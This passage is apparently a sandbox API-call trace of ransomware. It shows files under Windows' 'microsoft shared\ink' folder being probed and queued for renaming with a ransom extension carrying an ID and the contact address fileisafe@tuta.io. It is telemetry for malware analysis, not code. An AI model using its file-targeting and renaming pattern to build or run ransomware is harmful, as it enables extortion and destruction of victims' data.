0xffffffff [0147.035] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.036] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=177664) returned 1 [0147.036] CloseHandle (hObject=0x2f4) returned 1 [0147.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll")) returned 0x20 [0147.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.036] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.036] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.036] CloseHandle (hObject=0x2f4) returned 1 [0147.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui")) returned 0x20 [0147.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.037] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.038] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=733696) returned 1 [0147.038] CloseHandle (hObject=0x2f4) returned 1 [0147.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe")) returned 0x20 [0147.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.038] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.039] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0147.039] CloseHandle (hObject=0x2f4) returned 1 [0147.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui")) returned 0x20 [0147.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.039] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.039] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.039] CloseHandle (hObject=0x2f4) returned 1 [0147.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui")) returned 0x20 [0147.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.040] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.040] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0147.040] CloseHandle (hObject=0x2f4) returned 1 [0147.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui")) returned 0x20 [0147.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.040] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.041] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.041] CloseHandle (hObject=0x2f4) returned 1 [0147.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui")) returned 0x20 [0147.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.041] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.042] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=41984) returned 1 [0147.042] CloseHandle (hObject=0x2f4) returned 1 [0147.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll")) returned 0x20 [0147.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.042] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.043] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4101632) returned 1 [0147.043] CloseHandle (hObject=0x2f4) returned 1 [0147.043] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll")) returned 0x20 [0147.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0147.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll")) returned 0 [0147.043] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.044] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=391040) returned 1 [0147.044] CloseHandle (hObject=0x2f4) returned 1 [0147.044] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe")) returned 0x20 [0147.044] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.044] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.044] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0147.045] CloseHandle (hObject=0x2f4) returned 1 [0147.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui")) returned 0x20 [0147.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.045] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.046] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1086464) returned 1 [0147.046] CloseHandle (hObject=0x2f4) returned 1 [0147.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll")) returned 0x20 [0147.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.046] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.046] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=22016) returned 1 [0147.046] CloseHandle (hObject=0x2f4) returned 1 [0147.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll")) returned 0x20 [0147.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.047] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.047] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1053184) returned 1 [0147.047] CloseHandle (hObject=0x2f4) returned 1 [0147.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll")) returned 0x20 [0147.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.047] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.048] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=647584) returned 1 [0147.048] CloseHandle (hObject=0x2f4) returned 1 [0147.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")) returned 0x20 [0147.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.048] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.049] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=96768) returned 1 [0147.049] CloseHandle (hObject=0x2f4) returned 1 [0147.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll")) returned 0x20 [0147.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.049] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.052] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.052] CloseHandle (hObject=0x2f4) returned 1 [0147.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui")) returned 0x20 [0147.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 